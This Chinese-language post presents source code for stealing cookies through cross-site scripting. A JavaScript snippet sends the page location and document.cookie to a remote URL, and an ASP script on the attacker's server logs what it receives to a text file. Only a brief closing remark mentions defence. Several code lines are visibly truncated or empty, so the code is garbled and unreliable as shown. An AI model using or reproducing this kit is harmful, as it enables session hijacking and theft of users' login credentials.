asp+js 偷取Cookies源代码

盗取Cookie：一种隐秘的操作手法

通过嵌入一段精心设计的JavaScript脚本，可以无声无息地获取用户的Cookie信息，并将其传送到指定的服务器。这一切是如何实现的呢？让我们深入了解这一过程。

通过以下脚本将外部JavaScript文件引入网页中：

``

在XX.js文件中，编写如下代码：

```javascript

var code;

var target = "

var info = escape(document.location + "@@@" + document.cookie);

target = target + info;

code = "";

document.write(code);

```

这段代码的主要功能是将用户的当前网页地址和Cookie信息编码后，发送到一个特定的URL（即target）。这个URL对应的服务端程序会接收并处理这些信息。

在服务器端（cookie.asp），代码大致如下：

```asp

dim fso,file,str

str = unescape(request.Servervariables("QUERY_STRING"))

Const ForReading = 1, ForWriting = 2, ForAppending = 8

Set fso = Server.CreateObject("Scripting.FileSystemObject")

path = server.mappath("x.txt")

set file=fso.opentextfile(path, ForAppending, TRUE)

file.write("Xss:")

file.write(str)

file.write vbCrLf

file.close

set file = nothing

set fso = nothing

```

这段代码的主要任务是接收前端传来的信息，并将其写入到服务器上的一个文件中。这样，攻击者就可以在不接触目标系统的情况下，获取到用户的Cookie信息。这是一种典型的跨站脚本攻击（XSS）的应用。通过这种方式，攻击者可以轻易地获取用户的敏感信息，如登录凭证等。对于网站开发者来说，防范此类攻击至关重要。提醒广大用户，上网时务必注意保护个人信息，避免在不安全的网站上进行敏感操作。这样不仅可以防止个人信息泄露，还能降低遭受网络攻击的风险。